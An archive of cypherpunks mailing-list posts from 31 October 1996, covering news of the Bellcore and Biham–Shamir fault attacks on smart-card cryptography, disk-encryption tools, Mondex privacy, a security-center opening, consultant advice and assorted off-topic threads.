MIME-Version: 1.0
Content-Type: text/plain


   10-31-96. FiTi:

   "How to crack secret computer codes."

      Bellcore researchers plan to publish on the Internet
      this week technical details of a new method of cracking
      encryption systems used to protect computer data. The
      approach relies on spotting errors made by computers and
      applying a mathematical equation to work out secret
      encryption codes. "This is very sophisticated math. The
      only people who will understand it are other
      cryptography experts."

   -----

   http://jya.com/corset.txt  (3 kb)

   COR_set

   Details of the Bellcore smartcard hack? When, where?








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 31 Oct 1996 12:27:00 -0800 (PST)
To: Hard Media <cypherpunks@toad.com
Subject: RE: tcmay in favour of redistribution of wealth?
Message-ID: <3.0b19.32.19961031152617.006bd5bc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:27 PM 10/31/96 +0000, Hard Media wrote:
>
>Where Walter Wriston/Third World debt is concerned the events are not
>natural, we'r not talking about a flood, which is a "natural" event but the
>actions of a man, or if you prefer an organisation. There is nothing
"natural"
>about these.
>
>A country in debt to the IMF/World Bank or Citibank must accept
>"Stabilisation Policies" :

Tim is opposed to the existence of the World Bank and Robert McNamara.  No
libertarians I know of favor the existence of the World Bank.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 31 Oct 1996 15:39:58 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: BAY GUARDIAN ITEM
Message-ID: <Pine.SUN.3.91.961031152410.21855E-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

This item appeared in the calendar section of the San Francisco
Bay Guardian:

	INDEPENDENCE DAY  The Internet's status as a 
	censorship-free zone is a tenuous one, so a
	little digital activism is always in order.
	The San Francisco Art Institute's Center for
	Digital Media rises to the occasion with WEB
	FREEDOM DAY, a symposium addressing the
	implications of the Communications Decency Act
	and accompanying government regulation of the 
	Net.  The event inclludes a morning session
	with artists working in electronic media and
	an afternoon session with media lawyers, 
	activists, and multimedia developers exploring
	administrative and legal issues.  10 a.m.--6 p.m.,
	San Francisco Art Institute, Lecture Hall, 
	800 Chestnut, S.F.  Free.  (415) 749-4588.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TheShadow@nym.alias.net (Alan)
Date: Thu, 31 Oct 1996 08:29:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cracked DES?
Message-ID: <327fd332.72607607@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


This was in the 10/28 issue of Network World Infusion.  Did anyone else
see it?

Gurus prove that encryption's not all it's cracked up to be

	Two eminent Israeli cryptographers last week sent a shock wave
	through security circles with the announcement that they had
	figured out a way to extract private Data Encryption Standard
	(DES) encryption keys from such things as PCs and smart cards.
	Adi Shamir and Eli Biham showed they could get at even a
	Triple-DES secret key, by applying small amounts of heat or
	radiation to change the key's bit structure. Then, using a
	technique known as Differential Fault Analysis, they compared
	the encrypted outputs from both the damaged and undamaged cards
	to derive the key. ... Links include Biham's own overview of
	their findings, encryption primers and a time line of
	cryptography through the ages.  DocFinder: 2814.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 31 Oct 1996 14:02:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: On the Importance of Checking Computations
Message-ID: <1.5.4.32.19961031220115.006ad018@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The Bellcore report,  "On the Importance of Checking Computations" 
on technical details of fault-based cracking reported in today's FT, 
is available at:

     http://www.bellcore.com/SMART/index.html

Here's an outline:

On the Importance of Checking Computations
(Extended abstract)

Don Boneh, Richard A. DeMillo, and Richard J. Lipton
Math and Cryptography Research Group, Bellcore

Abstract: We present a theoretical model for breaking various
cryptographic schemes by taking advantage of random hardware
faults. We show how to attack certain implementations of RSA
and Rabin signatures. We also show how various authentication
protocols, such as Fiat-Shamir and Schnoor, can be broken
using hardware faults.

1. Introduction

     Transient faults
     Latent faults
     Induced faults

2. Chinese remainder based implementations

     2.1 The RSA system
     2.2 RSA's vulnerability to hardware faults

3. Register faults

4. The Fiat-Shamir identification scheme

     Theorem 4.1

     4.1 A modification of the Fiat-Shamir scheme

5. Attacking Schnoor's identification scheme

     Theorem 5.1

6. Breaking other implementations of RSA

     Theorem 6.1

7. Protecting against an attack based on hardware faults

8. Summary

References

-----

Registration is required for access. Two formats are available: 
Acrobat PDF (112kb) and Postscript PS (86kb).

Before registration, there is a brief "context" at:

     http://www.bellcore.com/SMART/secwp.html

Here's the first two paragraphs:


Context for "On the Importance of Checking Computations"

"On the Importance of Checking Computations" describes a 
fault-based method for breaking various cryptographic 
algorithms and exposes the degree to which computing faults 
can compromise information security. Once the authors -- 
Richard DeMillo, Dan Boneh and Richard Lipton -- articulated 
and proved their conceptual breakthrough, they realized that 
it might be successful in a wide variety of application
scenarios. Fault-based attacks potentially endanger many 
network security products and systems. The paper
summarizes the proof for the basic attack. 

Proof for fault-based cryptanalysis builds on the premise that 
an adversary can observe a faulty computation that occurs 
during cryptographic transactions. The faults that are exploited 
can occur at various sublevels within the logic level of a 
computing device -- that is, in the switching circuitry where 
arithmetic operations are performed or in the register transfer 
area where temporary values are stored in memory. The 
likelihood of faults occurring is not discussed in the paper. 

[Snip balance of Context]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 31 Oct 1996 17:32:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "Montgolfiering" mindlessness
Message-ID: <199611010131.RAA19080@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:18 AM 10/31/96 -0600, cypher@cyberstation.net wrote:
>Talk the talk |= Walk the walk`
>
>If we could bottle up all the hot air espoused by fools like you, we
>could solve the worldwide energy crisis. Obviously, you are not interested
>in the facts. You engage in baneful contravallation of jabberwocky since
>you, and the others so predisposed, are totally clueless with regard to
>how to break the algorithm.0
>
>Now let us hear your plaintive wail of the lame brain excuse about
>not wanting to waste your time, always the indicant of intellectual pap
>and intellectual cowardice/dishonesty by super mouthers like you. I may be
>mindless, but obviously you and Mr. Franz are  brainless, or otherwise you
>would try to prove something instead of beating off your brains and mouth
>about it. As with Perry, and  others your information content is:

Quite a flame.  And just because I said I liked the spoof of Don Woods'
style too.  (N.B. The slightly different version of the above that was
privately forwarded to me spelled my name correctly, both in the text and
the address.)


-------------------------------------------------------------------------
Bill Frantz       | Tired of Dole/Clinton?     | Periwinkle -- Consulting
(408)356-8506     | Vote 3rd party.  I'm       | 16345 Englewood Ave.
frantz@netcom.com | Voting for Harry Browne    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Center for Cryptography Computer and Network Security <cccns@miller.cs.uwm.edu>
Date: Thu, 31 Oct 1996 22:59:01 -0800 (PST)
To: desmedt@miller.cs.uwm.edu
Subject: Invitation: Please Post
Message-ID: <199611010017.SAA12464@miller.cs.uwm.edu>
MIME-Version: 1.0
Content-Type: text/plain


        OOO     PPPP    EEEEE   N     N   IIIIIII   N     N      GGGGG 
       O   O    P   P   E       NN    N      I      NN    N     G     G
      O     O   P   P   E       N N   N      I      N N   N    G       
      O     O   PPPP    EEE     N  N  N      I      N  N  N    G       
      O     O   P       E       N   N N      I      N   N N    G    GGG
       O   O    P       E       N    NN      I      N    NN     G     G
        OOO     P       EEEEE   N     N   IIIIIII   N     N      GGGGG 


                                    OF THE

            CENTER FOR CRYPTOGRAPHY, COMPUTER AND NETWORK SECURITY

                 Electrical Engineering and Computer Science
                  College of Engineering and Applied Science
                     University of Wisconsin - Milwaukee

                              November 21, 1996

            SCHEDULE:

               10:45 Welcome                                            
                                                                        
               11:00 Friction in Secret Sharing and Key Escrowing       
                       by G. R. BLAKLEY, Texas A&M University.          
                          co-inventor of secret sharing                  
                               
               11:45 Break                                              
                                                                        
               13:45 The State of the Art in Computational Number Theory
                       by ERIC BACH, University of Wisconsin, Madison.  
                          co-author of "Algorithmic Number Theory, Vol. 1"
                                                                        
               14:30 Coffee                                             
                                                                        
               15:15 Opening ceremony and introduction of keynote speaker.        
                                                                        
               15:30 The Importance of Cryptography to Industry         
                       by WHITFIELD DIFFIE, Sun Microsystems
                          co-inventor of public key
                                                                        
               16:30 Reception                                         

Related event: Friday November 22, Computer Science Seminar Series Lecture.

               15:30 Robust and Efficient Sharing of RSA Functions
                       by TAL RABIN, IBM T.J. Watson Research Center

You are cordially invited to attend the opening. For upcoming information,
such as the vitae of the speakers, the location of the event, the Center's
faculty members, driving instructions, consult: http://www.cs.uwm.edu/~cccns

Free registration requested. Please register by e-mail to cccns@cs.uwm.edu
Indicate whether you also plan to attend the lecture of Tal Rabin on Friday
November 22. Include your name and address.


          George Davida           Yvo Desmedt           Rene Peralta
          Professor               Professor             Associate Professor
                                  Director

The Center's purpose will be to advance knowledge in the areas of cryptography,
computer security, network security and related areas from theoretical as well
as practical viewpoints. For more details see: http://www.cs.uwm.edu/~cccns




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Thu, 31 Oct 1996 10:20:00 -0800 (PST)
To: Lou Zirko <cypherpunks@toad.com>
Subject: Key for dbell@maths.tcd.ie (key id 0x20C0C719)
Message-ID: <9610311818.aa07520@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In message <199610310150.RAA09499@blacklodge.c2.net>, Lou Zirko writes:
>Date: Wed Oct 30 20:49:53 1996
>Can you provide the key for key id 0x20C0C719, or a location where it can 
>be obtained so that your signed messages to cypherpunks can be verified.

	OK - my key is at http://www.maths.tcd.ie/~dbell/key.asc

	Apologies for the oversight,

	Derek
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQCVAgUBMnjte1XdSMogwMcZAQHPTwP/RvZ6psgaexodOyQ7MvzeS58UdhDZymA6
lJJMyc9ndKeL7v+z6nMzSxA+Isnhe1huGFs9A8ICFVXY6zT+uml//352StwClIoc
0qR4N64vHJVz1G7O5uXjyehT+viI08R5f6qdH5tDjJ9Zt7+zLRCDGOVcCp5mgSdO
BRkAQuB+u9Y=
=uBxL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Thu, 31 Oct 1996 10:50:14 -0800 (PST)
To: Hallam-Baker <cypherpunks@toad.com>
Subject: Re: When did Mondex ever claim to be anonymous?
In-Reply-To: <3278D196.41C6@ai.mit.edu>
Message-ID: <9610311849.aa09687@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In message <3278D196.41C6@ai.mit.edu>, Hallam-Baker writes:
>Actually the police are currently asking for permission to use wiretap
>evidence in court. There is some opposition because there are those who 
>want to keep the extent of the capability quiet. There is very good
>evidence for widespread use of wiretaps and SIGINT against the IRA.

	Interesting - I hadn't been following the matter, that's why I'd 
missed it. I knew MI5 was trying to get involved with anti-terrorism measures
in the UK, though I don't know with what success.

>Since when was cash annonymous? In the UK each banknote has a serial number 
>which is recorded at the banks when it is passed arround. There is no reason 
>why the US federal reserve wouldn't have added it to its existing note
>processing machinery since they must read the serial number during their 
>checks for countrefeit notes.

	It could be argued that it is a matter of degree - it is probably
easier to trace transactions through Mondex than with cash alone.

>If Mondex said their product was "like cash" that does not mean they
>claimed it to be anonymous.

	They say: "In everyday use Mondex transactions are private, like cash"
at http://www.mondex.com/faq.htm#anon

	Thus they are making two claims:
	1. Cash is anonymous.
	2. Mondex is like cash.

	Derek

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQCVAgUBMnj0t1XdSMogwMcZAQGE5QP5AWzSBVL0OMdX73b4Dnass7zAmwV/a/Te
PX+rWRxA0oOJpkEY8BIqrIhRqsYWpfCKyE9ngjvvIapmCQVg0CGQnl2FhF/D6lUa
kGNlEDuAHfJC/OWrBJRN3+BwTUCRgyHqmhkKusaUsf+reh4NBwAA25uD3QBui7tm
Nbxzv4MTwjY=
=NMiM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edgarswank@juno.com (Edgar W Swank)
Date: Thu, 31 Oct 1996 22:37:38 -0800 (PST)
To: Cypherpunks          <cypherpunks@toad.com>
Subject: Re: Encrypting Hard Disks
Message-ID: <19961031.190034.2918.8.edgarswank@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

FCri Kaljundi wrote:

>  Tue, 22 Oct 1996, Michael B Amoruso kirjutas:
>
>> Are there any good programs out there that can encrypt my HD??  Since
>> there probably are, please mention some and where I can get them. 
Also,
>> no one mention PGP.
>
>F-Secure Desktop from Data Fellows is pretty good. It uses Blowfish
>algorithm which means it is very fast on 32-bit Windows machines.
>
>More information at http://www.datafellows.com/f-secure/

- - From a quick perusal of the above web site, it appears as though
F-Secure Desktop offers encryption by file, much like PGP does, only a
little more automatic.  But an entire encrypted file must be decrypted
before you can process it and the entire file must then be
re-encrypted if it is updated.

- - From http://www.datafellows.com/f-secure/desktop/

    With the built-in AutoSecure(TM) feature, you can define sets of
    files, directories, and Windows 95 folders that will be
    automatically encrypted and decrypted every time you start or
    close Windows.

- - From this, it appears encrypted files are decrypted while windows is
open. Obviously if Windows crashes a lot of plaintext files can be
left lying around!

I prefer the methods of SecureDrive

  http://www.stack.urc.tue.nl/~galactus/remailers/securedrive.html

or Secure Device

  ftp://utopia.hacktic.nl/pub/replay/pub/disk/secdev14.arj

in which data is decrypted "on-the-fly" as it is transferred from
disk to memory.  The data is -always- encrypted on the disk. Both of
the above use strong IDEA encryption (same as PGP) and both are
free for non-commercial use. (Commercial use is possible by paying a
small royalty to the holders of the IDEA patent; see

  http://www.ascom.ch/systec

In contrast, F-Secure Desktop is $99 a copy.

Edgar W. Swank   <EdgarSwank@Juno.com>
                 (preferred)
Edgar W. Swank   <Edgar_W._Swank@ilanet.org>
Edgar W. Swank   <EdgarSwank@Freemark.com>
Home Page: http://members.tripod.com/~EdgarS/index.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMnjI9t4nNf3ah8DHAQHS0AP/WBYwqv2mJFJgBSIm9XUXMHPhi5WXSsXO
YkOvyWh2XScQNLUhpYc91eaoJakBIsvREPDA5MIFa7CF3UmSKHagBNuoHxOuy3ZP
x/eZpHykZyMrIzB/+eg65PFxo9ILaHMBog+qzTKqvCmAOGukegCzo3xbh1rpKswU
P4WhnYvkQOo=
=IGk8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 31 Oct 1996 18:57:05 -0800 (PST)
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: "Montgolfiering" mindlessness
Message-ID: <199611010256.SAA25614@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:47 AM 10/31/96 -0500, Rabid Wombat wrote:
>On Wed, 30 Oct 1996, Bill Frantz wrote:
>
>> Gee, I put that post in the same place I carefully keep my back issues of
>> the Cypherpunks Enquirer.
>> 
>
>Bill, you must be humor-impaired. That piece was a great send-up of 
>Woods. I was laughing 'til tears spilled down an shorted out my keyboard. 
>I dunno who posted that, but I'm in awe.

RW, you misunderstand me.  I viewed the piece as being as worthy of
preserving as back issues of the Cypherpunks Enquirer.  From me, that is
high praise.  While I didn't short out my keyboard, it did brighten an
otherwise stressful day.


-------------------------------------------------------------------------
Bill Frantz       | Tired of Dole/Clinton?     | Periwinkle -- Consulting
(408)356-8506     | Vote 3rd party.  I'm       | 16345 Englewood Ave.
frantz@netcom.com | Voting for Harry Browne    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Benjamin Grosman <bgrosman@healey.com.au>
Date: Thu, 31 Oct 1996 00:57:21 -0800 (PST)
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: WWII & Japan
Message-ID: <2.2.32.19961031085351.0093958c@healey.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear Sir,

>Japanese Ambassador Kichisaburo Nomura and Special Ambassador Saburo Kurusu
>were to present Secretary of State Cordell Hull a Declaration of War at 1pm
>Washington time on Dec. 7th. To achieve technical compliance with
>international rules it was intended to be delivered approx. 30 minutes prior
>to the actual attack. There were decoding difficulties however and it was
>delivered after the attack. Neither of the Ambassadors is thought to have
>had any knowledge of the actual attack and therefore did not understand the
>criticality of delivery. Japan intended to go to war with the United States,
>Great Britian, and Holland over their policies concerning the Japanese
>presence in China and Manchuria.

This is totally true, except that the American forces actually knew that an
attack was coming, and the Japanese ambassadors definitely had an inkling of
what was going to happen. Communicades to the Japanese ambassadors were
being made sparse as the attack came, and details of actions to come were
broken up into a 14 part message. On the USA side, the even knew that the
attack was coming on a Sunday. They had broken the Japanese codes, and had
been distributing the information from the communicades to pertinent
authorities. However, a copy of a communicade was found in a rubbish bin in
the hallway of a military building, and so distribution was reduced to fewer
people. But nobody wanted to take any notice. This begs the question of the
illegal lend-lease agreements between the Americans and the British which
could have had Roosevelt impeached if the details had come to light in congress.
However, as to the reason why the Japanese wanted to go to war, your
explanation is a little basic. It is true that the Japanese wanted to go to
war over the aforementioned countries policies concerning the Japanese
invasion and occupation of Manchuria, or Manchukuo as they called it.
However, this was not simply the reason. The aforementioned countries
policies barred export of vital natural resources to the Japanese, who live
in a naturally mineral poor country. Their original invasion was actually
staged (see "The Manchukuo Incident") in the hope that they could gain more
natural resources from Manchukuo. 
Another reason why the Japanese wanted war is a rather complicated one, and
it dates back to the end of World War I. At the end of the war most
countries in a position to have colonies in the pacific/orient area were
under severe financial stress. The French had borrowed so much money from
the USA that they had doubts of ever being able to count so high, and
Clemenceau, the "French Tiger", was determined to extract as much
reparations under the War Guilt Clause of the Versailles Treaty as possible.
The British had also borrowed phenomenal amounts of money. However, these
two, after taking all territorial possessions of the ex-German Empire, and
the ex-Austrian Empire, had in fact huge amounts of possessions. The British
Empire spanned roughly a third of the world in both population and size, and
the French were roughly two thirds as big as the British. But how to pay for
this massive Empire? Maintance of ships, particularly the newer Dreadnought
class Battleships, was incredibly expensive, and enough were not in
possession at the end of the war to defend pre-war borders, let alone the
newly expanded ones. Thus the British Empire, and the USA decided that it
was best to maintain the status quo. They had "run the race" and won. They
had their colonies (the USA had the Phillipines, and a few other pacific
islands, although the USA has always had a policy against Colonialism), and
they decided to end the possibility of another arms race via an agreement.
Thus it was that the Washington Naval Conference was formed. This conference
limited certain countries to certain ratio's of certain classes of ships, to
help maintain the status quo, and all measurements were done against the
British Navy. It was this conference and the forged agreement that came out
of it that greatly crippled Japan, in desperate need of Colonies and the
natural resources that could be exploited from them, for Japan was limited
to a navy roughly half the size of the British Navy, but consisting of
mainly smaller ships overall, for their quote of battleships was less than
half. Holland and France were also participating countries in this pact.
However, whilst it limited ships in the pacific regions, it did not limit
ships in other regions. This crippled Japan, but left _all other players_
with other waters in which to build ships (hence the large buildup of
Atlantic sea forces by the USA that facilitated the lend-lease agreements
later on). This in itself a heavy blow to the Japanese, but added to this
was the failure of the British to renew their alliance. Not only was the
most powerful empire in the world now not an ally of the Japanese, but the
Japanese could not even compete to provide what they needed. And the other
countries, naturally, liked this just fine.
Therefore, whilst your comments are true, they are only true in part. The
Japanese ambassadors certainly had a general idea as to what was following
due to the 14 part message, and the Japanese had more motive to attack than
a simple "policy of other countries" explanation warrants.

Yours Sincerely,

Benjamin Grosman





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Thu, 31 Oct 1996 17:01:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Computer Security Risk Assessment Software?
Message-ID: <9611010101.AA15878@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


Methinks "Ross Wright" <rwright@adnetsol.com> wrote:

>On or About 31 Oct 96 at 12:19, Dr.Dimitri Vulis KOTM wrote:
>
>> which I assume is NOT what you have in mind :-) Do you mean
>> something that'll take a survey of a company's computer security 
>
>Boom.  Nail, head, one shot!!!!  What's on the market now in that 
>area?
>
>> and
>> assess the risk (like Stan) or something more global? 
>
>The issues are:
>
>Information Risk Assessment and Management
>and also Information Security Assessment.
>
>> AFAIK, there's
>> no tool on the market to help in all aspects of risk management even
>> for a small outfit, because there are so many sources of risk. There
>> are many good specialized packages.
>

I beg to disagree.

Tools, like checklists, are ok as far as a memory jogger goes (to make 
sure that you haven't overlooked something) but there is no way they 
can replace an assessment or audit by a seasoned Information Security 
Officer or professional.  ISOs have eyes, ears, fingers, and a mind.
Tools don't.  

Further, assessments & audits require a mindset - usually  based on 
experience.  A tool in the hands of an inexperienced person (be they 
consultant, or whatever) will more than likely result in major 
vulnerabilities being overlooked.  There is no way a tool or checklist 
can have every possibility on it. (They don't make laptop hard drives 
big enough)  8^)  As Murphy's Law goes, the vulnerability that isn't 
mentioned in the tool will be the one that a hacker will use to crack 
the systems and start peeling the corporation like a grape.

Frequently, a reason people buy these tools are that they feel that 
the tools are more cost-effective than bringing in a consultant for
the engagement.  Their reasons for doing this are based on the fears
that that the consultant's fee will be too high, and that when the 
consultant leaves, so does the knowledge he used to perform the 
assessment.  In many cases, these fears are justified.  (There are
exceptions, however).

The solutions to the above-mentioned problems are:

o Shop around.  Find out which consultants are qualified and what 
   they charge.

o Make sure the consultant caps his cost.  You should know the maximum
   price tag associated with the consulting engagement BEFORE the 
   consultant walks in the front door.  This helps to avoid having the
   consultant camp on your doorstep at $XXX dollars per hour for days,
   weeks, or months on end.

o Check the consultants to see if they have ever worked as an Information
   Security Officer.  (Would you want to have eye surgery performed by 
   someone who read a book about it, or by someone who had is experienced
   at the trade.  IMHO, supplying textbook answers to non-textbook 
   corporations is for the birds.

o If the consultant is worth anything at all, they will walk the customer
   through the engagement (before the engagement is over) and TEACH them
   how to become self-sufficient in the areas of InfoSec which were part
   of the engagement.  (Sounds counter-productive for business, but the 
   word-of-mouth references are worth it.  It is also more honest than
   milking the client as some people do.  When the consultant leaves the 
   site, the customer should know what the consultant did, and be able to 
   follow the consultant's train-of-thought that led him to the recommend
   the particular solutions that he did.

o Last, but not least, it also wouldn't hurt if they were professional 
   enough to be a member of a consumer protection group (such as the 
   Better Business Bureau, etc).  This helps to keep the good guys 
   honest and helps customers differentiate between the professionals 
   and those who are out for a quick buck or just learned how to spell
   Information Security.

Food for thought.


Best Regards,


Frank
Any sufficiently advanced bug is indistinguishable from a feature.
	-- Rich Kulawiec

<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.

Fortified Networks Inc. - Information Security Consulting 
http://www.fortified.com     Phone: (317) 573-0800     FAX: (317) 573-0817     
Home of the Free Internet Firewall Evaluation Checklist







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Thu, 31 Oct 1996 19:10:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Looking for post on possible Law Articles
Message-ID: <199611010310.VAA16259@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to take up bandwidth, but I swore I saw a post from someone 
outlining (for what seemed to be a class) a series of legal questions 
regarding the net.  I was almost positive it came across my 
cypherpunks folder.

If anyone remembers this, or better yet still has the post, could you 
send it or a pointer my way?  

Thanks in advance.

Matt
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzDq+FoAAAEEANM9+JcJmUp4aCSGpdOG4Y1b6m4630XA8H41Utbvr7Tr6wEH
CD6tlxZ+k+Pycj4w/f8WQa8fC50skoLjUNeP4lYsR7NYaMGRp6WkqCLMI/3Nohvk
pfLDqnzZZdwVL2liB7mfTURoF6doQaVehHmMBjSaVTfD12tzNGm6VvyEc77JAAUR
tClNYXR0aGV3IEouIE1pc3pld3NraSA8bWptaXNraUBleGVjcGMuY29tPg==
=lkx1
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: the.news@shiftcontrol.com
Date: Thu, 31 Oct 1996 13:20:08 -0800 (PST)
Subject: Shift Control's new look
Message-ID: <199610312118.VAA24283@faust.guardian.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Shift Control has a new look this week. It's out with the old red, black 
and white, and in with a distinctly tasteful blue and cream. And the 
change in colours is just the start. We've listened to the feedback we've 
had about the site, and made it quicker and easier to access and read.

The content, of course, is as good as ever. In Critical Shift, William 
Leith asks what has happened to our heroes. "We don't want heroes 
anymore," he writes, "because we think we've failed as a race. We are 
hungry for stories which tell us about how nasty and greedy and 
self-destructive we are, because this is what we believe. We don't fall 
for a nice, smiling man who is nice to people. We wonder what he's hiding."

In Write Out of Control, we have three new pieces of writing. There's the 
next exclusive (and  rather shocking) instalment of Toby Litt's novel, 
'1/2'. We also have the first winner of our White Out of Control 
competition. Not only can you read it, but you can also write the sequel 
and win £200. And, in 'Large', Nick Green describes an awesome summer of 
pills and thrills on the festival scene.

"The first event of the summer," he writes, "saw me at my most 
ineffectual, having been rendered completely useless by what can only be 
described as 'a lethal drugs cocktail'. I didn't realise that a seemingly 
harmless combination of acid, speed, Ecstasy and skunk could be quite so 
debilitating."

In Plug n Play we bring you an interior design special - From Habitat to 
Hell and Back - and Fags-u-like, in which our special panel of cigarette 
connoisseurs smoke their way through several packs of fags in order to 
tell you which are the best.  

We've also changed our weekly diary. Instead of Roland bragging about his 
hyperactive social life, he now presents you with 10 essential cultural 
happenings for the week ahead. Gigs, clubs, movies and books - they're 
all in Roland's diary.

Yes, you'd be mad not to visit www.shiftcontrol.com this week.

Regards,

The Shift Control Team

Shift Control is produced by the Guardian New Media Lab, with help from 
Stella Artois and Boddingtons.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.net (Ulf =?ISO-8859-1?Q?M=F6ller?=)
Date: Thu, 31 Oct 1996 13:43:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: German Draft Digital Signature Law
Message-ID: <9610312143.AA12578@public.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain


Some more crypto-related news from Germany:

In Germany, online banking is a very popular application of the phone
company's online service T-Online.  Now Bank 24, a subsidary of Deutsche
Bank, is beginning to offer online banking on the Internet
(http://www.bank24.de).

They use SSL to transfer Java applets that securely encrypts the
financial data.  Export SSL is secure enough to guarantee that the
applets are authentic.  So much about exporting crypto hooks...


As journalist Detlev Borchers reports, the German tax consultants'
association Datev (http://www.datev.de) distributes a software toolkit
that allows their clients to transfer confidential data to the consultants
via AOL.  CompuServe or T-Online.  The toolkit uses PGP to encrypt the data.
At a press conference, the Datev spokesman was very surprised to learn
about political problems with encryption software -- because as he said,
the German tax authorities also use PGP (however, in a variant where the
patented IDEA algorithm has been replaced).


Last, but not least: Addison Wesley Germany has now published a German
edition of Applied Cryptography.  The book does contain source code.  I
wonder how they got the "munitions" from the US to the German printer?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Thu, 31 Oct 1996 19:48:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: new center at U. Wisconsin - Milwaukee
Message-ID: <199611010345.WAA01591@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


In case anyone is interested.

------- Forwarded Message

Received: from amontillado.research.att.com (amontillado.research.att.com [135.205.42.32]) by nsa.research.att.com (8.7.3/8.7.3) with ESMTP id UAA01185 for <mab-local@nsa.research.att.com>; Thu, 31 Oct 1996 20:17:34 -0500 (EST)
Received: from research.att.com (research.research.att.com [135.205.32.20]) by amontillado.research.att.com (8.7.5/8.7) with SMTP id UAA07551; Thu, 31 Oct 1996 20:17:02 -0500 (EST)
Received: from miller.cs.uwm.edu by research; Thu Oct 31 20:14:30 EST 1996
Received: (from cccns@localhost) by miller.cs.uwm.edu (8.8.2/8.8.2) id SAA12464; Thu, 31 Oct 1996 18:17:54 -0600 (CST)
Date: Thu, 31 Oct 1996 18:17:54 -0600 (CST)
Message-Id: <199611010017.SAA12464@miller.cs.uwm.edu>
From: Center for Cryptography Computer and Network Security <cccns@miller.cs.uwm.edu>
To: desmedt@miller.cs.uwm.edu
Subject: Invitation: Please Post

        OOO     PPPP    EEEEE   N     N   IIIIIII   N     N      GGGGG 
       O   O    P   P   E       NN    N      I      NN    N     G     G
      O     O   P   P   E       N N   N      I      N N   N    G       
      O     O   PPPP    EEE     N  N  N      I      N  N  N    G       
      O     O   P       E       N   N N      I      N   N N    G    GGG
       O   O    P       E       N    NN      I      N    NN     G     G
        OOO     P       EEEEE   N     N   IIIIIII   N     N      GGGGG 


                                    OF THE

            CENTER FOR CRYPTOGRAPHY, COMPUTER AND NETWORK SECURITY

                 Electrical Engineering and Computer Science
                  College of Engineering and Applied Science
                     University of Wisconsin - Milwaukee

                              November 21, 1996

            SCHEDULE:

               10:45 Welcome                                            
                                                                        
               11:00 Friction in Secret Sharing and Key Escrowing       
                       by G. R. BLAKLEY, Texas A&M University.          
